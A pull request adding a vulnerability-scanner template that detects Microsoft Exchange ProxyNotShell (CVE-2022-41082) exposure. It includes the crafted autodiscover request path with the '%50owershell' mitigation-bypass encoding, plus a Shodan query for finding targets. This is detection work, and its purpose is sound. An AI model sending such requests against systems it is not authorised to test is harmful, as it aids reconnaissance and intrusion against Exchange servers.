### PR TITLE
Added CVE-2022-41082

### DIFF
--- a/cves/2022/cve-2022-41082.yaml
+++ b/cves/2022/cve-2022-41082.yaml
@@ -21,7 +21,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/autodiscover/autodiscover.json?@random1337.com/%50owershell?=&Email=autodiscover/autodiscover.json?@random1337.com"
+      - "{{BaseURL}}/autodiscover/autodiscover.json?@{{randstr}}.com/%50owershell?=&Email=autodiscover/autodiscover.json?@{{randstr}}.com"
 
     matchers-condition: and
     matchers:

--- a/cves/2022/cve-2022-41082.yaml
+++ b/cves/2022/cve-2022-41082.yaml
@@ -3,7 +3,7 @@ id: CVE-2022-41082
 info:
   name: Microsoft Exchange ProxyNotShell
   author: UnaPibaGeek
-  severity: High
+  severity: high
   description: Microsoft Exchange Server Remote Code Execution Vulnerability.
   reference:
     - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-41082
@@ -13,7 +13,10 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2022-41082
-  tags: cve2022,cve,proxynotshell,rce,exchange
+  metadata:
+    verified: true
+    shodan-query: title:"Outlook"
+  tags: cve2022,cve,proxynotshell,rce,exchange,outlook
 
 requests:
   - method: GET

--- a/cves/2022/cve-2022-41082.yaml
+++ b/cves/2022/cve-2022-41082.yaml
@@ -1,0 +1,36 @@
+id: CVE-2022-41082
+
+info:
+  name: Microsoft Exchange ProxyNotShell
+  author: UnaPibaGeek
+  severity: High
+  description: Microsoft Exchange Server Remote Code Execution Vulnerability.
+  reference:
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-41082
+    - https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
+    - https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-41082
+  tags: cve2022,cve,proxynotshell,rce,exchange
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/autodiscover/autodiscover.json?@random1337.com/%50owershell?=&Email=autodiscover/autodiscover.json?@random1337.com"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(header, "X-Owa-Version")'
+          - 'contains(header, "X-Feserver")'
+        condition: or
+
+      - type: status
+        status:
+          - 302
+          - 401
+        condition: or
+

--- a/cves/2022/cve-2022-41082.yaml
+++ b/cves/2022/cve-2022-41082.yaml
@@ -33,4 +33,3 @@ requests:
           - 302
           - 401
         condition: or
-


### PR DESCRIPTION
### Template / PR Information

+ Added CVE-2022-41082 (Microsoft Exchange ProxyNotShell)
+ References:
  - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-41082
  - https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
  - https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)
It has the latest mitigation bypass '%50owershell' (check the last reference link for more information).
I had to use 'dsl' because with 'word' the template doesn't match well with these particular headers.
